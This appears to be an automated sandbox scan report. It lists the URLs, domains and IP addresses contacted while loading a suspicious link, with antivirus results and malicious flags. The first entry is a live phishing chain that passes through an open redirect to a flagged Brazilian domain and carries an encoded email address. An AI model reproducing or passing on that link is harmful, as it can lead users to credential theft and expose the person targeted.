    https://aeromexico.playable.video/xid_v:6533431697866752.uid_220877362/click/https://foxloc.com.br/g63a/Gcgaming/423184/#?email=YmthbXBodWlzQGdjZ2FtaW5nLmNvbQ==0%Avira URL Cloudsafe
    https://aeromexico.playable.video/xid_v:6533431697866752.uid_220877362/click/https://foxloc.com.br/g63a/Gcgaming/423184/#?email=YmthbXBodWlzQGdjZ2FtaW5nLmNvbQ==0%VirustotalBrowse
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    https://m.media-amazon.com/images/I/31J42iPc2iL._SR480,440_.jpg0%Avira URL Cloudsafe
    https://m.media-amazon.com/images/I/619NJGBXTvL._AC_SF226,226_QL85_.jpg?aicid=discounts-widgets-horizonte0%Avira URL Cloudsafe
    https://images-eu.ssl-images-amazon.com/images/G/39/electronics/store/kamja/WebQC/2021/Electronics/Feb_Smartwatch_1x._SY116_CB659040198_.jpg0%Avira URL Cloudsafe
    https://m.media-amazon.com/images/I/31EO3Wv+aeL._SR240,220_.jpg0%Avira URL Cloudsafe
    https://images-eu.ssl-images-amazon.com/images/G/39/UAE-hq/2020/img/Apparel/XCM_CUTTLE_1230335_1213331_UAE_3151168_153x125_en_AE._SY116_CB428587699_.jpg0%Avira URL Cloudsafe
    https://images-eu.ssl-images-amazon.com/images/G/39/electronics/store/kamja/WebQC/2021/Audio/Feb_Earphones_1x._SY116_CB659040113_.jpg0%Avira URL Cloudsafe
    https://m.media-amazon.com/images/I/31OXYlKv9gL._SR480,440_.jpg0%Avira URL Cloudsafe
    https://www.amazon.in0%Avira URL Cloudsafe
    https://cm.g.doubleclick.net/pixel?google_nid=a9eu&google_cm=&ex=doubleclick.net&gdpr_consent=&google_tc=0%Avira URL Cloudsafe
    https://unagi-na.amazon.com/1/events/com.amazon.csm.nexusclient.gamma0%Avira URL Cloudsafe
    https://www.amazon.it0%Avira URL Cloudsafe
    https://www.amazon.in0%VirustotalBrowse
    https://m.media-amazon.com/images/I/61OaibCCrKL._AC_SY200_.jpg0%Avira URL Cloudsafe
    https://unagi-na.amazon.com/1/events/com.amazon.csm.nexusclient.gamma0%VirustotalBrowse
    https://m.media-amazon.com/images/G/01/share-icons/0%Avira URL Cloudsafe
    https://www.amazon.it0%VirustotalBrowse
    https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:258-1179333-9864664:0RPFFN4XC9JAK0QN8ZQ4$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.295223.0%26id%3D0RPFFN4XC9JAK0QN8ZQ4%26ic%3D2%26m%3D1%26sc%3Dcsa%3Avl100%26vl100%3D417%26pc%3D5151%26at%3D5151%26t%3D1723729121680%26pty%3DFullPageAuthentication%26spty%3Dclaim%26pti%3Dundefined%26tid%3D0RPFFN4XC9JAK0QN8ZQ4%26aftb%3D1%26lob%3D1:51500%Avira URL Cloudsafe
    https://images-eu.ssl-images-amazon.com/images/I/01uyz9BO3mL._RC%7C01bzvM+YbkL.js,010ghrVeGXL.js,011ZAUoBkGL.js,01pfcv4RKLL.js,01QUgYbNyTL.js,01ikzOA7NuL.js,317dyAcfNdL.js,61REBL1DV8L.js,31B3HDxjAhL.js,01GHajztuJL.js,11Ff2wvxDJL.js,71-4br3F8hL.js,61gwjSycICL.js,61vZ+DrkZwL.js_.js?AUIClients/SharedShoppingCartDesktopAsset0%Avira URL Cloudsafe
    https://m.media-amazon.com/images/I/61BpJ-+2UGL._AC_SY200_.jpg0%Avira URL Cloudsafe
    https://m.media-amazon.com/images/G/39/electronic/kamja/Events/2024/BTS24/PH1/Nav/OFC/bts_ofc_03_ele0%Avira URL Cloudsafe
    https://m.media-amazon.com/images/I/31+4pNVeyCL._SR480,440_.jpg0%Avira URL Cloudsafe
    https://ib.adnxs.com/setuid/a9?entity=188&code=yzz1lUhzR0mqhMyLk0ySdw&redir=https%3A%2F%2Faax-eu.amazon-adsystem.com%2Fs%2Fecm3%3Fex%3DxandrHMT%26id%3D%24UID&gdpr_consent=0%Avira URL Cloudsafe
    https://m.media-amazon.com/images/I/11EIQ5IGqaL._RC0%Avira URL Cloudsafe
    https://public-prod-dspcookiematching.dmxleo.com/dspreply?dspId=1868&dspUserId=bYUuYICqQsKknbsvLmRwgg&redir=https%3A%2F%2Faax-eu.amazon-adsystem.com%2Fs%2Fecm3%3Fex%3DdailymotionHMT2&id=&gdpr_consent=0%Avira URL Cloudsafe
    https://aax-eu.amazon-adsystem.com/s/ecm3?ex=improvedigitalHMT&id=56850dde-f521-4220-b5ea-d074c8f18e01&gdpr_consent=0%Avira URL Cloudsafe
    https://m.media-amazon.com/images/I/11EIQ5IGqaL._RC0%VirustotalBrowse
    https://images-eu.ssl-images-amazon.com/images/G/39/AE-hq/2024/img/Apparel/XCM_CUTTLE_1710103_3712474_372x232_2X_en_AE._SY116_CB560039169_.jpg0%Avira URL Cloudsafe
    https://m.media-amazon.com/images/G/01/share-icons/0%VirustotalBrowse
    https://m.media-amazon.com/images/I/21cxge8YxxL.AC_SX250.jpg0%Avira URL Cloudsafe
    https://images-eu.ssl-images-amazon.com/images/G/39/UAE-hq/2024/img/Kitchen/XCM_CUTTLE_1715685_3745525_372x232_2X_en_AE._SY116_CB558011712_.jpg0%Avira URL Cloudsafe
    https://github.com/mozilla/source-map/issues/300%Avira URL Cloudsafe
    https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:258-1179333-9864664:0RPFFN4XC9JAK0QN8ZQ4$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.295223.0%26id%3D0RPFFN4XC9JAK0QN8ZQ4%26ic%3D2%26m%3D1%26sc%3Dcsa%3Asi%26si%3D417%26pc%3D5151%26at%3D5151%26t%3D1723729121680%26pty%3DFullPageAuthentication%26spty%3Dclaim%26pti%3Dundefined%26tid%3D0RPFFN4XC9JAK0QN8ZQ4%26aftb%3D1%26lob%3D1:51510%Avira URL Cloudsafe
    https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:258-1179333-9864664:646E5TEYAMSGQRNCHWPV$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.295223.0%26id%3D646E5TEYAMSGQRNCHWPV%26m%3D1%26sc%3Dcsa%3Avl50%26vl50%3D3451%26pc%3D15079%26at%3D15079%26t%3D1723729109593%26pty%3DLanding%26spty%3DBrowsePage%26pti%3D30082653031%26tid%3D1GXSAVZ7MBDVTNT0VYNB%26aftb%3D1%26lob%3D1:150790%Avira URL Cloudsafe
    https://m.media-amazon.com/images/I/61czlYZjf2L._AC_SY200_.jpg0%Avira URL Cloudsafe
    https://images-eu.ssl-images-amazon.com/images/I/01DM-rg61+L.js?AUIClients/F3CollapsedCartAssets0%Avira URL Cloudsafe
    https://github.com/mozilla/source-map/issues/300%VirustotalBrowse
    https://aax-eu.amazon.ae/e/xsp/imp?b=RHKWoaXzh7P4jAXd27JeqmcAAAGRVkKHAQMAAAIGAQBvbm9fdHhuX2JpZDEgICBvbm9fdHhuX2ltcDEgICBPaQEf&pj=%7B%22measurementMethod%22%3A%22cod_client%22%7D0%Avira URL Cloudsafe
    https://m.media-amazon.com/images/I/41xkTNTvpwL._SR2400%Avira URL Cloudsafe
    https://m.media-amazon.com/images/I/41xkTNTvpwL._SR4800%Avira URL Cloudsafe
    https://images-eu.ssl-images-amazon.com/images/I/01rdVnPkgmL._RC%7C01CzAMryqJL.css_.css?AUIClients/ListsDesktopCartMoveToListAssets0%Avira URL Cloudsafe
    https://dsum-sec.casalemedia.com/rrum?cm_dsp_id=198&external_user_id=9wKYsJ4CT2yWvth808m3GQ&cb=https%3A%2F%2Faax-eu.amazon-adsystem.com%2Fs%2Fecm3%3Fex%3DindexHMT%26id%3D&gdpr_consent=0%Avira URL Cloudsafe
    https://m.media-amazon.com/images/I/51TvQK5HLrL.AC_SX250.jpg0%Avira URL Cloudsafe
    https://images-eu.ssl-images-amazon.com/images/G/39/UAE-hq/2023/img/Consumer_Electronics/XCM_CUTTLE_1615422_3332325_186x116_1X_en_AE._SY116_CB597933578_.jpg0%Avira URL Cloudsafe
    https://issues.amazon.com/issues/KAT-1534)0%Avira URL Cloudsafe
    https://www.facebook.com/fr/r.php?p=558293300959460&e=N3EFGF3vTTeRiAfcQ-KSyQ&r=https%3A%2F%2Faax-eu.amazon-adsystem.com%2Fs%2Fecm3%3Fex%3Dfbca%26id%3DN3EFGF3vTTeRiAfcQ-KSyQ&s=1723729112&h=Njg2Nk5GelFkWnJZeTZOSGzH6NeIET6qtJz9QSkaNyDsZuMR0%Avira URL Cloudsafe
    https://images-eu.ssl-images-amazon.com/images/I/A1fXNtoo+RL.js?AUIClients/ACICAssets0%Avira URL Cloudsafe
    https://m.media-amazon.com/images/S/sash/e0LnMbFWJC-TMQz.woff)0%Avira URL Cloudsafe
    https://m.media-amazon.com/images/G/39/electronic/kamja/Events/2024/BTS24/PH1/Nav/OFC/bts_ofc_01_writing_en._CB568181090_.png0%Avira URL Cloudsafe
    https://images-eu.ssl-images-amazon.com/images/G/39/AE-hq/2022/img/Sports/XCM_Manual_1521089_5259737_400x400_2X._CB617696541_.jpg0%Avira URL Cloudsafe
    https://www.amazon.nl0%Avira URL Cloudsafe
    https://images-eu.ssl-images-amazon.com/images/G/39/AE-hq/2023/img/Consumer_Electronics/XCM_CUTTLE_1615980_3334867_186x116_1X_en_AE_1._SY116_CB597773556_.jpg0%Avira URL Cloudsafe
    https://m.media-amazon.com/images/G/39/consumables_uae/Amazonbasket/XCM_Manual_1532278_5307764_400x30%Avira URL Cloudsafe
    https://m.media-amazon.com/images/G/39/electronic/kamja/Events/2024/BTS24/PH1/Nav/OFC/bts_ofc_06_pla0%Avira URL Cloudsafe
    https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:258-1179333-9864664:V0ARH6GWVSW29RT7ZWDG$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.295223.0%26id%3DV0ARH6GWVSW29RT7ZWDG%26m%3D1%26sc%3Dcsa%3Aatfsi%26atfsi%3D2076%26pc%3D8133%26at%3D8133%26t%3D1723729140343%26pty%3DShoppingCart%26spty%3DCart%26pti%3Dundefined%26tid%3DV0ARH6GWVSW29RT7ZWDG%26aftb%3D1%26lob%3D1:81320%Avira URL Cloudsafe
    https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:258-1179333-9864664:646E5TEYAMSGQRNCHWPV$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.295223.0%26id%3D646E5TEYAMSGQRNCHWPV%26m%3D1%26sc%3Dcsa%3Avl100%26vl100%3D6967%26pc%3D15080%26at%3D15080%26t%3D1723729109594%26pty%3DLanding%26spty%3DBrowsePage%26pti%3D30082653031%26tid%3D1GXSAVZ7MBDVTNT0VYNB%26aftb%3D1%26lob%3D1:150800%Avira URL Cloudsafe
    http://opensource.org/licenses/BSD-3-Clause0%Avira URL Cloudsafe
    https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:258-1179333-9864664:0RPFFN4XC9JAK0QN8ZQ4$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.295223.0%26id%3D0RPFFN4XC9JAK0QN8ZQ4%26ic%3D2%26m%3D1%26sc%3Dcsa%3Avl90%26vl90%3D417%26pc%3D5150%26at%3D5150%26t%3D1723729121679%26pty%3DFullPageAuthentication%26spty%3Dclaim%26pti%3Dundefined%26tid%3D0RPFFN4XC9JAK0QN8ZQ4%26aftb%3D1%26lob%3D1:51490%Avira URL Cloudsafe
    https://m.media-amazon.com/images/I/81B7s-7r48L._AC_SY200_.jpg0%Avira URL Cloudsafe
    https://m.media-amazon.com/images/G/01/style-snap/close-large.png0%Avira URL Cloudsafe
    https://t.corp.amazon.com/0%Avira URL Cloudsafe
    https://m.media-amazon.com/images/S/sash/prp2-N9d2Q$gDX5.gif)0%Avira URL Cloudsafe
    https://www.amazon.co.uk0%Avira URL Cloudsafe
    https://images-eu.ssl-images-amazon.com/images/I/31bJewCvY-L.js0%Avira URL Cloudsafe
    https://blog.ameba.jp0%Avira URL Cloudsafe
    https://images-eu.ssl-images-amazon.com/images/G/39/UAE-hq/2024/img/Apparel/XCM_CUTTLE_1717076_3763818_372x232_2X_en_AE._SY116_CB558609315_.jpg0%Avira URL Cloudsafe
    https://completion.amazon.com0%Avira URL Cloudsafe
    https://m.media-amazon.com/images/I/31N-r+VYSWL.js0%Avira URL Cloudsafe
    https://m.media-amazon.com/images/S/sash/5uJUWEszo9hoRiT.png);background-size:contain0%Avira URL Cloudsafe
    https://m.media-amazon.com/images/I/31qnSUxnD0L._SR480,440_.jpg0%Avira URL Cloudsafe
    https://m.media-amazon.com/images/I/61za6jnk1GL._AC_SY200_.jpg0%Avira URL Cloudsafe
    https://www.amazon.com.au0%Avira URL Cloudsafe
    https://cm.g.doubleclick.net/pixel?google_nid=medr&google_cm&key=GOO&process_consent=T&action=GET_ID&opid=goo&etid=&domid=1106&ops=apx0%Avira URL Cloudsafe
    https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:258-1179333-9864664:V0ARH6GWVSW29RT7ZWDG$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.295223.0%26id%3DV0ARH6GWVSW29RT7ZWDG%26m%3D1%26sc%3Dcsa%3Avl50%26vl50%3D1707%26pc%3D8133%26at%3D8133%26t%3D1723729140343%26pty%3DShoppingCart%26spty%3DCart%26pti%3Dundefined%26tid%3DV0ARH6GWVSW29RT7ZWDG%26aftb%3D1%26lob%3D1:81320%Avira URL Cloudsafe
    https://m.media-amazon.com/images/I/71fUZu5nc0L._AC_SY200_.jpg0%Avira URL Cloudsafe
    https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:258-1179333-9864664:646E5TEYAMSGQRNCHWPV$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.295223.0%26id%3D646E5TEYAMSGQRNCHWPV%26m%3D1%26sc%3Dcsa%3Asi%26si%3D3525%26pc%3D15082%26at%3D15082%26t%3D1723729109596%26pty%3DLanding%26spty%3DBrowsePage%26pti%3D30082653031%26tid%3D1GXSAVZ7MBDVTNT0VYNB%26aftb%3D1%26lob%3D1:150820%Avira URL Cloudsafe
    https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:258-1179333-9864664:XRRBVETR66S3T97BM5KF$uedata=s:%2Frd%2Fuedata%3Fld%26v%3D0.295223.0%26id%3DXRRBVETR66S3T97BM5KF%26ctb%3D1%26sc0%3Dadplacements%3AsfImpression%3A3221523e-c639-400a-a04d-789177f02209%26bb0%3D4066%26pc0%3D72407%26ld0%3D72319%26t0%3DThu%20Aug%2015%202024%2009%3A39%3A07%20GMT-0400%20(Eastern%20Daylight%20Time)%26pty%3DGateway%26spty%3Ddesktop%26pti%3Ddesktop%26tid%3DXRRBVETR66S3T97BM5KF%26aftb%3D1%26lob%3D1:724070%Avira URL Cloudsafe
    https://uipus.semasio.net/amazon/1/get?_url=https%3A%2F%2Faax-eu.amazon-adsystem.com%2Fs%2Fecm3%3Fex%3Dsemasio%26id%3D%24%7BUIPID%28%29%7D0%Avira URL Cloudsafe
    https://image6.pubmatic.com/AdServer/UCookieSetPug?rd=https%3A%2F%2Faax-eu.amazon-adsystem.com%2Fs%2Fecm3%3Fex%3Dpubmatic.com%26id%3D%23PM_USER_ID&gdpr_consent=&rdf=10%Avira URL Cloudsafe
    https://aax-eu.amazon-adsystem.com/s/ecm3?ex=index&id=L-wz6xtD89VwUjAGeNXQizc4dL44ZgAC0%Avira URL Cloudsafe
    https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:258-1179333-9864664:XRRBVETR66S3T97BM5KF$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.295223.0%26id%3DXRRBVETR66S3T97BM5KF%26m%3D1%26sc%3Dcsa%3Alcp%26lcp%3D2928%26pc%3D62409%26at%3D62409%26t%3D1723729137720%26csmtags%3Daui%3Asw%3Abrowser%3Aregister%3Asupported%26pty%3DGateway%26spty%3Ddesktop%26pti%3Ddesktop%26tid%3DXRRBVETR66S3T97BM5KF%26aftb%3D1%26lob%3D1:624100%Avira URL Cloudsafe
    https://images-eu.ssl-images-amazon.com/images/I/0152SLDk8CL.js?AUIClients/OctopusBrowsePageAssets0%Avira URL Cloudsafe
    https://images-eu.ssl-images-amazon.com/images/G/39/AE-hq/2023/img/Consumer_Electronics/XCM_CUTTLE_1615980_3334872_186x116_1X_en_AE_3._SY116_CB597773556_.jpg0%Avira URL Cloudsafe
    https://m.media-amazon.com/images/I/61-jK4RR+mL._AC_SY200_.jpg0%Avira URL Cloudsafe
    https://m.media-amazon.com/images/I/618LrXHTM3L._AC_SY200_.jpg0%Avira URL Cloudsafe
    https://bugs.chromium.org/p/v8/issues/detail?id=3175#c40%Avira URL Cloudsafe
    https://www.amazon.ae/service-worker.js0%Avira URL Cloudsafe
    https://images-eu.ssl-images-amazon.com/images/I/01NdXlDE17L.css?AUIClients/InContextAuthBaseAssets0%Avira URL Cloudsafe
    https://m.media-amazon.com/images/I/31iocnwzJSL._SR480,440_.jpg0%Avira URL Cloudsafe
    https://www.amazon.ae/a/addresses?ref_=footer_yad0%Avira URL Cloudsafe
    https://images-eu.ssl-images-amazon.com/images/G/39/UAE-hq/2023/img/Consumer_Electronics/XCM_CUTTLE_1615422_3332322_186x116_1X_en_AE._SY116_CB597933578_.jpg0%Avira URL Cloudsafe
    https://stackoverflow.com/questions/11547672/how-to-stringify-event-object)0%Avira URL Cloudsafe
    https://images-eu.ssl-images-amazon.com/images/G/39/UAE-hq/2020/img/Apparel/XCM_CUTTLE_1230335_1213328_UAE_3151165_153x125_en_AE._SY116_CB428587699_.jpg0%Avira URL Cloudsafe
    https://m.media-amazon.com/images/G/39/electronic/kamja/Events/2024/BTS24/PH1/Nav/OFC/bts_ofc_10_pens_en._CB568181090_.png0%Avira URL Cloudsafe
    https://m.media-amazon.com/images/I/71pFC0n2-AL._AC_SF226,226_QL85_.jpg?aicid=discounts-widgets-horizonte0%Avira URL Cloudsafe
    https://images-na.ssl-images-amazon.com/images/G/01/poppin/JavaScript/moment-timezone-with-data.min.0%Avira URL Cloudsafe
    https://services.amazon.ae/services/sell-on-amazon/benefits.html?_encoding=UTF8&ld=AZAESOA&refTag=fo0%Avira URL Cloudsafe
    https://m.media-amazon.com/images/I/61byCU9Ne1L._AC_SY200_.jpg0%Avira URL Cloudsafe
    https://us-u.openx.net/w/1.0/cm?cc=1&id=e818ca1e-0c23-caa8-0dd3-096b0ada08b7&r=https%3A%2F%2Faax-eu.amazon-adsystem.com%2Fs%2Fecm3%3Fex%3Dopenx.com%26id%3D%7BOPENX_ID%7D&gdpr_consent=0%Avira URL Cloudsafe
    https://eff.contempi.su/favicon.ico0%Avira URL Cloudsafe
    https://uipus.semasio.net/amazon/1/get2?_url=https%3A%2F%2Faax-eu.amazon-adsystem.com%2Fs%2Fecm3%3Fex%3Dsemasio%26id%3D%24%7BUIPID%28%29%7D0%Avira URL Cloudsafe
    NameIPActiveMaliciousAntivirus DetectionReputation
    pugm-sin12.pubmnet.com
    207.65.33.83
    truefalse
      unknown
      d2u28gf9o4d1cv.cloudfront.net
      3.164.163.31
      truefalse
        unknown
        eu-eb2.3lift.com
        13.248.245.213
        truefalse
          unknown
          foxloc.com.br
          108.167.132.199
          truetrue
            unknown
            crb.kargo.com
            3.126.77.184
            truefalse
              unknown
              rtb-csync-euw1.smartadserver.com
              81.17.55.172
              truefalse
                unknown
                d1nruqhae353qc.cloudfront.net
                18.245.200.5
                truefalse
                  unknown
                  cm.g.doubleclick.net
                  142.250.186.66
                  truefalse
                    unknown
                    www.google.com
                    142.250.186.100
                    truefalse
                      unknown
                      www-amazon-de.customer.fastly.net
                      162.219.224.163
                      truefalse
                        unknown
                        star-mini.c10r.facebook.com
                        157.240.0.35
                        truefalse
                          unknown
                          us-u.openx.net
                          35.244.159.8
                          truefalse
                            unknown
                            uip.semasio.net
                            77.243.51.121
                            truefalse
                              unknown
                              sync.rfp.fout.jp
                              35.186.196.148
                              truefalse
                                unknown
                                eff.contempi.su
                                172.67.144.37
                                truefalse
                                  unknown
                                  euw-ice.360yield.com
                                  34.251.192.12
                                  truefalse
                                    unknown
                                    sync-yieldmo-com-tf-1869548451.eu-west-1.elb.amazonaws.com
                                    52.214.238.45
                                    truefalse
                                      unknown
                                      bg.microsoft.map.fastly.net
                                      199.232.214.172
                                      truefalse
                                        unknown
                                        ssum-sec.casalemedia.com
                                        104.18.36.155
                                        truefalse
                                          unknown
                                          envoy-hl.envoy-csync1.core-b8mf.ov1o.com
                                          35.214.128.5
                                          truefalse
                                            unknown
                                            djvbdz1obemzo.cloudfront.net
                                            52.222.239.71
                                            truefalse
                                              unknown
                                              rd.frontend.weborama.fr
                                              35.190.24.218
                                              truefalse
                                                unknown
                                                unagi-na.amazon.com
                                                44.215.136.177
                                                truefalse
                                                  unknown
                                                  sync.sxp.smartclip.net
                                                  35.186.194.101
                                                  truefalse
                                                    unknown
                                                    ghs.googlehosted.com
                                                    216.58.206.51
                                                    truefalse
                                                      unknown
                                                      tagr-pixel-nginx-odr-euw4.mookie1.com
                                                      34.160.236.64
                                                      truefalse
                                                        unknown
                                                        public-prod-dspcookiematching.dmxleo.com
                                                        188.65.124.66
                                                        truefalse
                                                          unknown
                                                          user-data-eu.bidswitch.net
                                                          35.214.149.91
                                                          truefalse
                                                            unknown
                                                            usersync.gumgum.com
                                                            34.247.233.198
                                                            truefalse
                                                              unknown
                                                              fp2e7a.wpc.phicdn.net
                                                              192.229.221.95
                                                              truefalse
                                                                unknown
                                                                c.media-amazon.com
                                                                18.239.85.223
                                                                truefalse
                                                                  unknown
                                                                  dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com
                                                                  52.214.73.191
                                                                  truefalse
                                                                    unknown
                                                                    rtb-csync-euw2.smartadserver.com
                                                                    217.182.178.234
                                                                    truefalse
                                                                      unknown
                                                                      a.nel.cloudflare.com
                                                                      35.190.80.1
                                                                      truefalse
                                                                        unknown
                                                                        static.siege-amazon.com
                                                                        18.239.83.45
                                                                        truefalse
                                                                          unknown
                                                                          completion.amazon.co.uk
                                                                          3.253.166.191
                                                                          truefalse
                                                                            unknown
                                                                            s.amazon-adsystem.com
                                                                            52.46.151.131
                                                                            truefalse
                                                                              unknown
                                                                              aax-eu.amazon-adsystem.com
                                                                              52.95.115.255
                                                                              truefalse
                                                                                unknown
                                                                                ygbz.prosolmi.su
                                                                                188.114.96.3
                                                                                truefalse
                                                                                  unknown
                                                                                  media.amazon.map.fastly.net
                                                                                  151.101.129.16
                                                                                  truefalse
                                                                                    unknown
                                                                                    d2h8zr0m6mus4x.cloudfront.net
                                                                                    13.32.118.131
                                                                                    truefalse
                                                                                      unknown
                                                                                      completion.amazon.com
                                                                                      44.215.128.78
                                                                                      truefalse
                                                                                        unknown
                                                                                        unagi-eu.amazon.com
                                                                                        52.95.122.73
                                                                                        truefalse
                                                                                          unknown
                                                                                          aax-eu-retail-direct.amazon-adsystem.com
                                                                                          52.94.222.127
                                                                                          truefalse
                                                                                            unknown
                                                                                            dsum-sec.casalemedia.com
                                                                                            172.64.151.101
                                                                                            truefalse
                                                                                              unknown
                                                                                              adserver-prod-alb-2056226458.eu-central-1.elb.amazonaws.com
                                                                                              3.72.129.255
                                                                                              truefalse
                                                                                                unknown
                                                                                                pug-ams-bc.pubmnet.com
                                                                                                198.47.127.205
                                                                                                truefalse
                                                                                                  unknown
                                                                                                  lb.mediarithmics.com
                                                                                                  54.36.150.184
                                                                                                  truefalse
                                                                                                    unknown
                                                                                                    adserver-logmodule-prod-nlb-v17-49f63daf8a61d3c8.elb.eu-central-1.amazonaws.com
                                                                                                    18.196.77.193
                                                                                                    truefalse
                                                                                                      unknown
                                                                                                      ib.anycast.adnxs.com
                                                                                                      185.89.210.244
                                                                                                      truefalse
                                                                                                        unknown
                                                                                                        load-euw1.exelator.com
                                                                                                        34.254.143.3
                                                                                                        truefalse
                                                                                                          unknown
                                                                                                          dlsq0ztllwnya.cloudfront.net
                                                                                                          108.156.39.62
                                                                                                          truefalse
                                                                                                            unknown
                                                                                                            edge.gycpi.b.yahoodns.net
                                                                                                            87.248.119.251
                                                                                                            truefalse
                                                                                                              unknown
                                                                                                              endpoint.prod.eu-west-1.forester.a2z.com
                                                                                                              54.78.35.196
                                                                                                              truefalse
                                                                                                                unknown
                                                                                                                match-eu-central-1-ecs.sharethrough.com
                                                                                                                18.197.30.174
                                                                                                                truefalse
                                                                                                                  unknown
                                                                                                                  uipus.semasio.net
                                                                                                                  50.57.31.206
                                                                                                                  truefalse
                                                                                                                    unknown
                                                                                                                    images-na.ssl-images-amazon.com
                                                                                                                    unknown
                                                                                                                    unknownfalse
                                                                                                                      unknown
                                                                                                                      ads.stickyadstv.com
                                                                                                                      unknown
                                                                                                                      unknownfalse
                                                                                                                        unknown
                                                                                                                        audex.userreport.com
                                                                                                                        unknown
                                                                                                                        unknownfalse
                                                                                                                          unknown
                                                                                                                          unagi.amazon.ae
                                                                                                                          unknown
                                                                                                                          unknownfalse
                                                                                                                            unknown
                                                                                                                            www.amazon.de
                                                                                                                            unknown
                                                                                                                            unknownfalse
                                                                                                                              unknown
                                                                                                                              lm.serving-sys.com
                                                                                                                              unknown
                                                                                                                              unknownfalse
                                                                                                                                unknown
                                                                                                                                csync.loopme.me
                                                                                                                                unknown
                                                                                                                                unknownfalse
                                                                                                                                  unknown
                                                                                                                                  images-eu.ssl-images-amazon.com
                                                                                                                                  unknown
                                                                                                                                  unknownfalse
                                                                                                                                    unknown
                                                                                                                                    odr.mookie1.com
                                                                                                                                    unknown
                                                                                                                                    unknownfalse
                                                                                                                                      unknown
                                                                                                                                      cookie-matching.mediarithmics.com
                                                                                                                                      unknown
                                                                                                                                      unknownfalse
                                                                                                                                        unknown
                                                                                                                                        c1.adform.net
                                                                                                                                        unknown
                                                                                                                                        unknownfalse
                                                                                                                                          unknown
                                                                                                                                          pixel.rubiconproject.com
                                                                                                                                          unknown
                                                                                                                                          unknownfalse
                                                                                                                                            unknown
                                                                                                                                            sync-amazon.ads.yieldmo.com
                                                                                                                                            unknown
                                                                                                                                            unknownfalse
                                                                                                                                              unknown
                                                                                                                                              www.amazon.ae
                                                                                                                                              unknown
                                                                                                                                              unknownfalse
                                                                                                                                                unknown
                                                                                                                                                usermatch.krxd.net
                                                                                                                                                unknown
                                                                                                                                                unknownfalse
                                                                                                                                                  unknown
                                                                                                                                                  uipglob.semasio.net
                                                                                                                                                  unknown
                                                                                                                                                  unknownfalse
                                                                                                                                                    unknown
                                                                                                                                                    m.media-amazon.com
                                                                                                                                                    unknown
                                                                                                                                                    unknownfalse
                                                                                                                                                      unknown
                                                                                                                                                      image6.pubmatic.com
                                                                                                                                                      unknown
                                                                                                                                                      unknownfalse
                                                                                                                                                        unknown
                                                                                                                                                        match.sharethrough.com
                                                                                                                                                        unknown
                                                                                                                                                        unknownfalse
                                                                                                                                                          unknown
                                                                                                                                                          loadus.exelator.com
                                                                                                                                                          unknown
                                                                                                                                                          unknownfalse
                                                                                                                                                            unknown
                                                                                                                                                            rtb-csync.smartadserver.com
                                                                                                                                                            unknown
                                                                                                                                                            unknownfalse
                                                                                                                                                              unknown
                                                                                                                                                              image2.pubmatic.com
                                                                                                                                                              unknown
                                                                                                                                                              unknownfalse
                                                                                                                                                                unknown
                                                                                                                                                                capi.connatix.com
                                                                                                                                                                unknown
                                                                                                                                                                unknownfalse
                                                                                                                                                                  unknown
                                                                                                                                                                  aax-eu.amazon.ae
                                                                                                                                                                  unknown
                                                                                                                                                                  unknownfalse
                                                                                                                                                                    unknown
                                                                                                                                                                    dpm.demdex.net
                                                                                                                                                                    unknown
                                                                                                                                                                    unknownfalse
                                                                                                                                                                      unknown
                                                                                                                                                                      fls-eu.amazon.ae
                                                                                                                                                                      unknown
                                                                                                                                                                      unknownfalse
                                                                                                                                                                        unknown
                                                                                                                                                                        x.bidswitch.net
                                                                                                                                                                        unknown
                                                                                                                                                                        unknownfalse
                                                                                                                                                                          unknown
                                                                                                                                                                          www.facebook.com
                                                                                                                                                                          unknown
                                                                                                                                                                          unknownfalse
                                                                                                                                                                            unknown
                                                                                                                                                                            beacon.krxd.net
                                                                                                                                                                            unknown
                                                                                                                                                                            unknownfalse
                                                                                                                                                                              unknown
                                                                                                                                                                              tags.bluekai.com
                                                                                                                                                                              unknown
                                                                                                                                                                              unknownfalse
                                                                                                                                                                                unknown
                                                                                                                                                                                bs.serving-sys.com
                                                                                                                                                                                unknown
                                                                                                                                                                                unknownfalse
                                                                                                                                                                                  unknown
                                                                                                                                                                                  pbs.yahoo.com
                                                                                                                                                                                  unknown
                                                                                                                                                                                  unknownfalse
                                                                                                                                                                                    unknown
                                                                                                                                                                                    ib.adnxs.com
                                                                                                                                                                                    unknown
                                                                                                                                                                                    unknownfalse
                                                                                                                                                                                      unknown
                                                                                                                                                                                      match.360yield.com
                                                                                                                                                                                      unknown
                                                                                                                                                                                      unknownfalse
                                                                                                                                                                                        unknown
                                                                                                                                                                                        fls-eu.amazon.com
                                                                                                                                                                                        unknown
                                                                                                                                                                                        unknownfalse
                                                                                                                                                                                          unknown
                                                                                                                                                                                          aeromexico.playable.video
                                                                                                                                                                                          unknown
                                                                                                                                                                                          unknowntrue
                                                                                                                                                                                            unknown
                                                                                                                                                                                            amazon.partners.tremorhub.com
                                                                                                                                                                                            unknown
                                                                                                                                                                                            unknownfalse
                                                                                                                                                                                              unknown
                                                                                                                                                                                              completion.amazon.ae
                                                                                                                                                                                              unknown
                                                                                                                                                                                              unknownfalse
                                                                                                                                                                                                unknown
